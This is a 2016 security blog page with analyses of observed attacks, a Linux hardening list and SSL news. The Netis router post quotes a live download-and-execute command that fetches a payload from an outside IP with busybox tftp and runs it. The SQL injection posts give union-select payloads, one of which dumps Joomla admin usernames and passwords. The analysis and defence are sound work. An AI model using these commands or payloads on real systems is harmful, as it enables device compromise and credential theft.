neonprimetime security , just trying to help

Friday, August 5, 2016

Netis Router Backdoor UDP 53413

I saw this SANS Internet Storm Center post about Netis Router Backdoor exploit attempts. Thought it'd be interesting to take a quick look at one of them. It's a raw UDP packet sent to port 53413 with a shell command to be executed. Looks very similar to all those Shellshock attempts you continue to see in your logs.

cd /tmp || cd /var/ || cd /dev/;busybox tftp -r min -g 91.134.141.49;cp /bin/sh .;cat min >sh;chmod 777 sh;./sh.

So first ...

cd /tmp || cd /var/ || cd /dev/;

The first thing the attacker tries it to move into a directory where he likely has read/write permissions. Thus he uses the double-pipe (||) to so that if the first command fails, the second command is executed, and if that one fails, the third is executed. Thus it's essentially an if this command works do it, otherwise try the next, otherwise try the next. So he sees if he has permission to move into the /tmp folder or the /var folder or the /dev folder. If he moves into any of those folders then he's ready to execute the more interesting commands.

Then

busybox tftp -r min -g 91.134.141.49;

Next the user is taking advantage of busybox, which is a tool that is on many embedded linux devices (likely the Netis Router that is exploitable) and this tool has many basic linux commands/functions such as tftp.

tftp [OPTIONS] HOST [PORT]

Transfer a file from/to tftp server

Options:

-r FILE Remote FILE
-g Get file

So the attacker is using the tftp command to get a remote file called 'min', in this case from the server at 91.134.141.49 and save it to the current directory (again this could be /tmp, /var, or /dev depending on the first command excecuted).

Then

cp /bin/sh .;

Next the user makes a copy of the shell executable to the current directory (again this could be /tmp, /var, or /dev depending on the first command excecuted).

Then

cat min >sh;

Next the attacker appears to concatenate the contents of the downloaded file to the end of the sh executable, thus when the sh executable is run it will run not only the standard commands but also the ones the attacker appended to it.

Then

chmod 777 sh;

Then the sh permissions are changed so that the attacker is able to execute them.

Then

./sh.

Finally the attacker executes the sh executable which includes his downloaded payload and your server is likely now compromised.

To prevent this I'm not sure that I've seen anything about Netis actually patching it so you probably need some sort of IPS (Intrusion Prevention System) that has a signature match that can block this type of traffic.

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0

Thursday, August 4, 2016

Simple MySQL SQL Injection Example

I saw this SQL injection attempt and thought it was worth mentioning. SourceIp: 5.101.156.112
GET /?Cookie=language99999' union select unhex(hex(version())) -- 'x'='x HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; eMusic DLM/3; MSN Optimized;US; MSN Optimized;US)

The attacker must believe the Cookie query string parameter is vulnerable to SQL injection. So they put in a value (language99999) but try to escape the sql parameter with an apostrophe.

Thus for example if the web developer was performing a database query such as

select result from language table where id='@Cookie'

The attempt here is to escape that parameter and union (join) in the search results with another evil query such as.

select result from language table where id='language99999' union select unhex(hex(version())) -- 'x'='x'

The attacker is using 3 MySQL functions in this attack
1.) version() which returns the MYSQL version number.
2.) hex() which converts a string to a hex value.
3.) unhex() which converts a hex value back to a string.

In theory if this works the MYSQL database version will get returned instead of the language result.

As a sysadmin to prevent this ensure your website is up to date and patched, and implement an IPS or WAF that could block these basic attacks even if you are vulnerable.

As a web developer to prevent this ensure you're using strongly typed parameterized sql queries and in addition do pattern matching to ensure that parameters like language are in the format you expect and do SQL injection security sanitization libaries so that evil characters like apostrophes are encoded and rendered harmless.

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0

Wednesday, August 3, 2016

What is www.dsply.com ?

I recently ran across a suspicious looking domain name in some SSL certificate traffic www.dsply.com and wondered if others had the same question. What is it? Below I do a little quick research to determine.

First I used a proxy method (urlquery or a lab, etc.) to navigate to the url and sure enough there is even a nice explanation explaining that it's a domain name used for cookie/customer tracking of users of the Answers.com website.

Being in security, I naturally don't trust what I see ... so I wanted to confirm this (because any Joe Blow could've put up this splash page claiming to be affiliated with Answers.com). So I navigated to Answers.com in chrome and ran developer tools.

In developer tools under Network I looked, and sure enough there is a script call to www.dsply.com so unless somebody has hacked Answers.com or my browser , it's safe for me to assume that www.dsply.com is a legit domain used by Answers.com to track it's users. Some sorta master tracking cookie.

Now whether you choose to block this cookie or not is more of a privacy issue, but I don't believe it's a security risk/hacked domain or anything like that. Thus you can move on and look at something else now :-)

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0

Tuesday, August 2, 2016

Article on Securing a Linux Server

Thought this was a fun little blog by Cody Littlewood about Securing a Linux Server. He runs through the things he does in the first 10 minutes and I though they were worth listing out. Quite a bit of good discussion in the comments after it as well.

1.) Setup a strong root password
2.) Update your apt repositories
3.) Upgrade your patches via atp
4.) Add your user (so you don't ever use root again)
5.) Setup SSH key authentication (so eventually below we can eliminate passwords)
6.) Setup sudo for your user
7.) Enforce SSH key authentication (don't allow root login, eliminate password auth, ip filter)
8.) Setup your local firewall (don't forget your ip filter you added for ssh)
9.) Enable automatic security updates
10.) Enable fail2ban to block suspicious activity real-time
11.) Enable 2-factor authentication (like google authenticator)
12.) Enable a tool like LogWatch to ensure you are monitoring your logs

It's a good start to your Server Build/Hardening guide you should have.

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0

SSL in the News

Just a couple positive movements around SSL / HTTPS in the news over the past few months.

8/1/2016 - Google enables HSTS
By using HSTS, visitors following HTTP links to Google.com will be automatically redirected to the more secure HTTPS version of the Google domain. The effort, announced Friday, is meant to protect against protocol downgrade attacks, session hijacking and man-in-the-middle attacks that exploit insecure web connections.

6/8/2016 - Google Gmail deprecating SSLv3 and RC4
Google said that it will initiate on June 16 a gradual deprecation of SSLv3 and RC4 for Gmail IMAP/POP mail clients. Both the crypto protocols cipher are notoriously unsafe and are being phased out in big chunks of the Internet. Google, for its part, had already announced in May that it would no longer support SSLv3 and RC4 connections for Gmail SMTP.

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0

Joomla SQL Injection Walk-Through

I saw this pastebin post with a joomla sql injection exploit perl script that I thought was interesting enough to write a bit about.

Upon reviewing the code I see that the exploit constructs a url such as

http://victim.com/index.php?option=com_jumi&fileid=93&Itemid=117+UNION+SELECT+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from/**/jos_users+--+

This appears to exploit a Joomla com_jumi parameter called 'Itemid' that must not properly sanitize user input and thus allows for sql commands to be injected and executed against the database.

It's likely that behind the scenes the Joomla developers are performing a query on the database such as

select |24 fields| from |itemtable| where Itemid = HttpRequest["ItemId"]

But since they aren't sanitizing the ItemId parameter an attacker can enter a value such below (notice the + signs above are simply a way to encode spaces in a URL so I've removed them). Also notice that /**/ is just an empty comment and does nothing except obfuscate so it can safely be removed for analysis. Also notice that 0x3a is the hex equivalent of the single colon character (:) so I've replaced it also for simplicity.

ItemId=117 UNION SELECT 1,concat(username,':',password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from jos_users --

So you see above that we first pass in an actual item id (117) so that the query returns at least a single record. Next there is a "union select" which means weren't going to union or concatenate or join the results of the SQL query defined by the developer with a SQL query we are going to define. Now in order to union or combine 2 SQL queries the number of columns must match, thus the reason you see 24 columns (23 of them are integer values that the system would automatically cast/convert into string if needed). The attacker must know that column #2 is the one that the website displays on the screen in the html response, thus they choose to display their exfiltrated data in column #2. What they display is the username and password concatenated together from the jos_users table. It is likely the case that the 1st record in this table is the Joomla administrator, thus if this attack is successful, the administrative username and password will be displayed out to the browser.

To prevent this as a Sys Admin of a Joomla site, upgrade and patch as soon as patches are available. If you see active exploits, implement an IPS (intrusion prevention system) that allows you to block malicious looking requests like this.

To prevent this as a web developer, use strongly typed parameterized SQL queries so that an Integer (like ItemId) cannot be converted into a string. Also utilize a standard Security library that sanitized or encodes malicious looking characters like the +,/,*, or -

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0

Monday, August 1, 2016

SNMP get-next-request Recon

I noticed some external recon via SNMP. There were 2 requests, both over port 161 from the internet. They were IP packets via UDP. The requests both seem to be "get-next-request", both from the same source and to the same destination.

SNMP get-next request to retrieve SNMP MIB (management information base) table values. The MIB values are referenced using a series of dotted integers. For example a request for the MIB variable "1.3.6.1.2.1.1.1" would return the system description for the network device. So if it's a router is would return the vendor, version, etc. with the commands below.

The only differences between the 2 requests are
1.) version
2.) request-id

SNMP version-1 (0) is the oldest version and uses plaintext everything. The SNMP v2c (1) is the same as version-1 except that it has a larger counter field for more flexible polling intervals of systems being monitored. There is a version 3 that adds security, but the attacker is not looking for this version thus I can only assume that whatever they're after is only applicable if they find v1 or v2.

The request-id is just a unique integer that identifies that specific message, so it makes sense that each request contains a different id.

Thus the conclusion is that the attacker is using these packet requests to try to determine if this device is responding to snmp v1 or v2 perhaps with a tool like SNMPWalk and then determining what type of device it is. The attacker can turn around and use this information determine what patch level it's at and what attacks it can turn around and use to exploit against it.

Simple Network Management Protocol
version: version-1 (0)
community: public
data: get-next-request (1)
   get-next-request
    request-id: 1118066890
    error-status: noError (0)
    error-index: 0
    variable-bindings: 1 item
     1.3.6.1.2.1.1.1.0: Value (Null)
      Object Name: 1.3.6.1.2.1.1.1.0 (iso.3.6.1.2.1.1.1.0)
      Value (Null)

Simple Network Management Protocol
version: v2c (1)
community: public
data: get-next-request (1)
   get-next-request
    request-id: 1118066889
    error-status: noError (0)
    error-index: 0
    variable-bindings: 1 item
     1.3.6.1.2.1.1.1.0: Value (Null)
      Object Name: 1.3.6.1.2.1.1.1.0 (iso.3.6.1.2.1.1.1.0)
      Value (Null)

SANS provides a nice link explaining snmp recon.

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0